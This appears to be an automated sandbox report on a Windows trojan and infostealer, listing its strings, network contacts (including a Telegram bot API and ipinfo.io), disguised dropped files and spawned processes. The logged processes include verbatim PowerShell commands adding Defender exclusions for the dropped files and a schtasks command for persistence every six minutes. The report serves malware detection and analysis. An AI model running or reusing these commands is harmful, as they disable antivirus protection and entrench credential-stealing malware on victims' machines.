Source: powershell.exe, 0000001A.00000002.3316254602.000001942C68E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.AppV.
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000013.00000002.1850990457.0000022F047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384E9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194142A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: SfbAu0ICZn.exe, 00000000.00000002.1721457571.00000000016D2000.00000002.00000001.01000000.00000000.sdmp, DsQyKcEJ.log.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000032.00000003.1876329348.000001871B71A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000032.00000003.1876329348.000001871B6A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B6F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: SfbAu0ICZn.exe, 00000000.00000002.1721457571.00000000016D2000.00000002.00000001.01000000.00000000.sdmp, DsQyKcEJ.log.0.dr	String found in binary or memory: https://ipinfo.io/country
Source: SfbAu0ICZn.exe, 00000000.00000002.1721457571.00000000016D2000.00000002.00000001.01000000.00000000.sdmp, DsQyKcEJ.log.0.dr	String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000013.00000002.3027055525.0000022F14844000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2810868073.0000026F10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2996178084.000001EA14944000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3072476405.000002385EA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2965146623.0000019424315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000032.00000003.1876329348.000001871B672000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Recovery\opHipgZM6eS.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Windows\CbsTemp\ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Windows\CbsTemp\ctfmon.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Windows\CbsTemp\26c12092da979c	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B800D48		0_2_00007FFD9B800D48
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Code function: 0_2_00007FFD9B800E43		0_2_00007FFD9B800E43

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\DsQyKcEJ.log B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6

Source: SfbAu0ICZn.exe, 00000000.00000002.1721457571.00000000016D2000.00000002.00000001.01000000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 00000000.00000000.1656972479.0000000000D0A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 00000000.00000002.1791771584.000000001C25A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 00000000.00000002.1791771584.000000001C25A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 0000002B.00000002.2444903334.0000000002850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 0000002B.00000002.2444903334.0000000002912000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 0000002B.00000002.2444903334.000000000286C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 0000002B.00000002.2444903334.0000000002862000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe, 0000002C.00000002.2374465634.00000000029C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe
Source: SfbAu0ICZn.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SfbAu0ICZn.exe

Source: SfbAu0ICZn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SfbAu0ICZn.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TMqwtuekPHF.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lYlhyYPN9gkdqQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ctfmon.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/297@4/4

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File created: C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe

Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File created: C:\Users\user\Desktop\RZKXfllq.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Recovery\opHipgZM6eS.exe	Mutant created: NULL
Source: C:\Recovery\opHipgZM6eS.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-8b1zxCwdDi0myNJsjDFc

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File created: C:\Users\user\AppData\Local\Temp\6tiEPiChm1

Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat"

Source: SfbAu0ICZn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SfbAu0ICZn.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IQvqRiwf20.49.dr, KqfCFoQ12G.49.dr, Mbe95Rsngz.49.dr, mJiF6dNGLT.49.dr, G9O0YFX7TO.49.dr, maHkBXeCIh.49.dr, xhUZuVHYxo.49.dr, YCsvVlWSed.49.dr, 0vgpz3AvLT.49.dr, nVfcGmh5JR.49.dr, uL4zQEZBqP.49.dr, 7nzWrZydL5.49.dr, alyotcNuiu.49.dr, zmUyhsmr7l.49.dr, BIRhSHeVxS.49.dr, NtcJ9bVdHM.49.dr, GzMIqjTEU1.49.dr, Eqn37dncO5.49.dr, 066Q0n47Dd.49.dr, XzAalKc0ZH.49.dr, rArenHMSG6.49.dr, hIk1Em5yhQ.49.dr, u3Bs6Ujob8.49.dr, 9qtTuPVswv.49.dr, 7wEGGcFbBI.49.dr, Zd1us4zJY8.49.dr, 1KBDxxEqPL.49.dr, VHJoPA4nG1.49.dr, NfVidnFdQr.49.dr, 2Io7ciGarQ.49.dr, tSMCJ4zVdd.49.dr, 3lj8mCShpz.49.dr, xhEv1k4LJ2.49.dr, F9fKV4vzc9.49.dr, 2FXOtit5eG.49.dr, BPp17XmdWb.49.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SfbAu0ICZn.exe	Virustotal: Detection: 75%
Source: SfbAu0ICZn.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File read: C:\Users\user\Desktop\SfbAu0ICZn.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SfbAu0ICZn.exe "C:\Users\user\Desktop\SfbAu0ICZn.exe"
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "opHipgZM6eSo" /sc MINUTE /mo 6 /tr "'C:\Recovery\opHipgZM6eS.exe'" /f
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\CbsTemp\ctfmon.exe C:\Windows\CbsTemp\ctfmon.exe
Source: unknown	Process created: C:\Windows\CbsTemp\ctfmon.exe C:\Windows\CbsTemp\ctfmon.exe
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe"
Source: unknown	Process created: C:\Recovery\opHipgZM6eS.exe C:\Recovery\opHipgZM6eS.exe
Source: unknown	Process created: C:\Recovery\opHipgZM6eS.exe C:\Recovery\opHipgZM6eS.exe
Source: unknown	Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
Source: unknown	Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Users\user\Desktop\SfbAu0ICZn.exe C:\Users\user\Desktop\SfbAu0ICZn.exe
Source: unknown	Process created: C:\Users\user\Desktop\SfbAu0ICZn.exe C:\Users\user\Desktop\SfbAu0ICZn.exe
Source: unknown	Process created: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe"
Source: unknown	Process created: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\opHipgZM6eS.exe "C:\Recovery\opHipgZM6eS.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "opHipgZM6eSo" /sc MINUTE /mo 6 /tr "'C:\Recovery\opHipgZM6eS.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\opHipgZM6eS.exe "C:\Recovery\opHipgZM6eS.exe"

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
